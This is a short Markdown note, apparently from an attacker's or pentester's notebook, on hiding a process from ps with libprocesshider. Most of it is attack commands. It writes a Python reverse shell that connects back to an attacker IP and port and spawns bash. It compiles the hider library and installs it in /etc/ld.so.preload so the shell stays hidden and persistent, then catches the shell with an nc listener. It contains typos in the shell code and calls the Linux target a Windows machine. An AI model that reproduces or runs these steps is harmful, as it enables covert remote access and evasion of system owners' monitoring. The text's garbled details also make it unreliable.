72 lines
1.8 KiB
Markdown
72 lines
1.8 KiB
Markdown
|
|
||
|
## General
|
||
|
|
||
|
GOAL ---> Hide process from `ps aux`
|
||
|
|
||
|
Libprocesshider is a library that allows software developers to hide the details of a process from the operating system. It provides an API for hiding the process name and arguments, as well as for hiding the presence of the process from process management utilities. The library is useful for hiding the details of malware or other types of malicious software, as well as for protecting proprietary software from reverse engineering.
|
||
|
|
||
|
Important
|
||
|
- Can only hide one process at the time
|
||
|
|
||
|
|
||
|
## Commands
|
||
|
|
||
|
The reposity need to be cloned on the target (windows machine)
|
||
|
|
||
|
Download the reposity (Target)
|
||
|
```
|
||
|
git clone https://github.com/gianlucaborello/libprocesshider.git
|
||
|
```
|
||
|
|
||
|
Create reverse shell and compile the code (Target)
|
||
|
```
|
||
|
# Create a rever shell (reverse_shell.py)
|
||
|
nano reverse_shell.py
|
||
|
#!/usr/bin/python3
|
||
|
from os import dup2
|
||
|
from subprocess import run
|
||
|
import socket
|
||
|
s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||
|
s.connect(("IP",PORT))
|
||
|
dup2(s.fileno(),0)
|
||
|
dup2(s.fileno(),1)
|
||
|
dup2(s.fileno(),2)
|
||
|
run([*/bin/bash","-i*])
|
||
|
|
||
|
# Give chmod permission
|
||
|
chmod +x reverse_shell.py
|
||
|
|
||
|
# Edit processhider.c
|
||
|
nano processhider.c
|
||
|
- Change the script name of the python code for your evil code
|
||
|
- Save
|
||
|
|
||
|
# Compile the code in the direcotry
|
||
|
USER@sid:~/libprocesshider$ make
|
||
|
'---> This will create libprocesshider.so
|
||
|
|
||
|
# Copy the file in the right folder
|
||
|
cp libprocesshider.so /usr/local/lib/
|
||
|
|
||
|
# Load it with the global dynamic linker
|
||
|
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
|
||
|
```
|
||
|
|
||
|
Launch the reverse_shell
|
||
|
```
|
||
|
./reverse_shell.py
|
||
|
```
|
||
|
|
||
|
Netcat Lisener (Attacking)
|
||
|
```
|
||
|
nc -lvnp PORT
|
||
|
```
|
||
|
|
||
|
The process should now be hiden
|
||
|
|
||
|
|
||
|
## More Information
|
||
|
|
||
|
More information ---> https://github.com/gianlucaborello/libprocesshider
|
||
|
|